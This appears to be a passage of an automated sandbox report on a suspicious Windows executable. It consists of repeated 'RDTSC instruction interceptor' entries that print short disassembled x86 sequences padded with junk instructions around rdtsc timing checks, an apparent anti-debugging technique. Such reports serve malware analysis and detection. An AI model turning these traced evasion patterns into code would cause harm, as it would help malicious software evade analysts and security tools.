                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C5383 second address: 6C539A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jne 00007FED75508866h 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C57D6 second address: 6C57DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C57DC second address: 6C57F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FED75508871h 0x00000008 jmp 00007FED7550886Bh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C57F2 second address: 6C580A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED74F3E516h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FED74F3E516h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C580A second address: 6C581F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508870h 0x00000009 popad 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C80BF second address: 6C8114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dx, di 0x0000000f push 00000000h 0x00000011 jmp 00007FED74F3E523h 0x00000016 push 7316E533h 0x0000001b push esi 0x0000001c pushad 0x0000001d jmp 00007FED74F3E524h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C8114 second address: 6C818A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 7316E5B3h 0x0000000d mov dx, cx 0x00000010 push 00000003h 0x00000012 call 00007FED7550886Bh 0x00000017 mov dword ptr [ebp+122D1C56h], ecx 0x0000001d pop esi 0x0000001e push 00000000h 0x00000020 xor ecx, 67827052h 0x00000026 pushad 0x00000027 cld 0x00000028 push eax 0x00000029 mov di, 5C8Fh 0x0000002d pop ecx 0x0000002e popad 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FED75508868h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b add dword ptr [ebp+122D1D01h], edx 0x00000051 push 6552850Dh 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b jmp 00007FED7550886Eh 0x00000060 popad 0x00000061 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C8361 second address: 6C8387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f pushad 0x00000010 jns 00007FED74F3E516h 0x00000016 jng 00007FED74F3E516h 0x0000001c popad 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C8387 second address: 6C838B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C838B second address: 6C8391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C8391 second address: 6C83D1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FED75508868h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jc 00007FED7550886Eh 0x00000016 jng 00007FED75508868h 0x0000001c pop eax 0x0000001d mov si, 5717h 0x00000021 lea ebx, dword ptr [ebp+1244FF8Dh] 0x00000027 and cx, 05ECh 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007FED7550886Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C8446 second address: 6C8460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E521h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C8460 second address: 6C8464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C8464 second address: 6C84A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007FED74F3E51Ch 0x0000000f ja 00007FED74F3E516h 0x00000015 jmp 00007FED74F3E51Dh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 jc 00007FED74F3E516h 0x00000027 jc 00007FED74F3E516h 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 jnp 00007FED74F3E516h 0x00000036 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C84A2 second address: 6C84B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FED75508866h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C84B5 second address: 6C84B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C84B9 second address: 6C84BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C84BF second address: 6C84C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FED74F3E516h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C84C9 second address: 6C84CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C84CD second address: 6C8517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jng 00007FED74F3E51Ah 0x00000012 pop eax 0x00000013 jbe 00007FED74F3E51Ch 0x00000019 mov ecx, dword ptr [ebp+122D3724h] 0x0000001f push 00000003h 0x00000021 xor dword ptr [ebp+122D17D4h], eax 0x00000027 push 00000000h 0x00000029 jno 00007FED74F3E51Bh 0x0000002f push 00000003h 0x00000031 sub dword ptr [ebp+122D1DC9h], edx 0x00000037 push 9A31F0A4h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C8517 second address: 6C851B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C851B second address: 6C8578 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FED74F3E51Fh 0x0000000f popad 0x00000010 add dword ptr [esp], 25CE0F5Ch 0x00000017 ja 00007FED74F3E51Ch 0x0000001d lea ebx, dword ptr [ebp+1244FF98h] 0x00000023 sub dword ptr [ebp+122D1820h], edi 0x00000029 xchg eax, ebx 0x0000002a jnc 00007FED74F3E528h 0x00000030 jmp 00007FED74F3E522h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007FED74F3E518h 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6DB477 second address: 6DB47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6DB47B second address: 6DB489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FED74F3E51Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E888A second address: 6E88DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FED7550886Ah 0x00000014 popad 0x00000015 jmp 00007FED7550886Dh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jnl 00007FED75508866h 0x00000024 jmp 00007FED75508877h 0x00000029 popad 0x0000002a jmp 00007FED7550886Ah 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E8A34 second address: 6E8A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FED74F3E516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E8A40 second address: 6E8A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E8A44 second address: 6E8A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E8A48 second address: 6E8A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E8A55 second address: 6E8AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FED74F3E546h 0x00000011 jmp 00007FED74F3E528h 0x00000016 jmp 00007FED74F3E528h 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007FED74F3E516h 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E8E45 second address: 6E8E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FED75508866h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E8F83 second address: 6E8F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E90DE second address: 6E90E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E90E6 second address: 6E9102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FED74F3E523h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E9102 second address: 6E9106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6E9106 second address: 6E910A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6EA224 second address: 6EA22A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6EA22A second address: 6EA234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FED74F3E516h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6BD391 second address: 6BD395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F6E89 second address: 6F6E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F6E95 second address: 6F6EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508872h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F7284 second address: 6F72B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FED74F3E52Ch 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FED74F3E524h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jo 00007FED74F3E516h 0x0000001c jne 00007FED74F3E516h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F72B7 second address: 6F72CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FED75508872h 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F76EE second address: 6F7708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F7708 second address: 6F7733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ecx 0x00000008 jg 00007FED75508866h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FED75508866h 0x00000017 jmp 00007FED75508874h 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F7733 second address: 6F7737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FAE3A second address: 6FAEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FED75508868h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FED7550886Eh 0x00000019 pushad 0x0000001a jmp 00007FED7550886Fh 0x0000001f jmp 00007FED7550886Bh 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 jg 00007FED75508868h 0x0000002f pushad 0x00000030 popad 0x00000031 push ecx 0x00000032 jp 00007FED75508866h 0x00000038 pop ecx 0x00000039 popad 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e jmp 00007FED75508877h 0x00000043 pop eax 0x00000044 jmp 00007FED75508870h 0x00000049 push 4AB5381Bh 0x0000004e pushad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FB540 second address: 6FB575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED74F3E525h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FBA00 second address: 6FBA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FC519 second address: 6FC51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FC51D second address: 6FC52B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FC52B second address: 6FC530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FE525 second address: 6FE52B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FE52B second address: 6FE530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 70152F second address: 7015C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 jnc 00007FED7550886Ch 0x0000000e pop esi 0x0000000f nop 0x00000010 jc 00007FED7550886Ch 0x00000016 or edi, 272462D9h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FED75508868h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 add dword ptr [ebp+122D1B93h], ebx 0x0000003e mov edi, eax 0x00000040 mov si, cx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007FED75508868h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 0000001Bh 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f xchg eax, ebx 0x00000060 je 00007FED7550886Eh 0x00000066 jno 00007FED75508868h 0x0000006c push eax 0x0000006d pushad 0x0000006e jp 00007FED75508868h 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 pop esi 0x00000078 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7067E6 second address: 7067FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED74F3E51Ah 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7067FD second address: 706802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 70775A second address: 707765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FED74F3E516h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 707765 second address: 7077C2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED75508868h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d stc 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FED75508868h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D17F3h] 0x00000032 xchg eax, esi 0x00000033 jbe 00007FED75508877h 0x00000039 push edx 0x0000003a jmp 00007FED7550886Fh 0x0000003f pop edx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FED7550886Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7077C2 second address: 7077C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 708766 second address: 70876B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7079B2 second address: 7079B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 70876B second address: 7087AD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED75508868h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FED75508868h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov bh, ah 0x00000027 add dword ptr [ebp+1247B672h], ebx 0x0000002d push 00000000h 0x0000002f stc 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D2383h], edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d pop edx 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 70965D second address: 709662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7088ED second address: 7088F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 709662 second address: 709668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7098A6 second address: 7098AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 70A83D second address: 70A8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1D2Ah], edx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b xor ebx, dword ptr [ebp+122D36C8h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D1820h], eax 0x0000002e mov eax, dword ptr [ebp+122D052Dh] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FED74F3E518h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 nop 0x00000051 je 00007FED74F3E51Ch 0x00000057 pushad 0x00000058 push esi 0x00000059 pop esi 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FED74F3E51Ch 0x00000065 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 70B7F3 second address: 70B7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7105F7 second address: 7105FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7114CE second address: 7114D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 70F785 second address: 70F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71080E second address: 710812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7126C7 second address: 7126D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FED74F3E51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
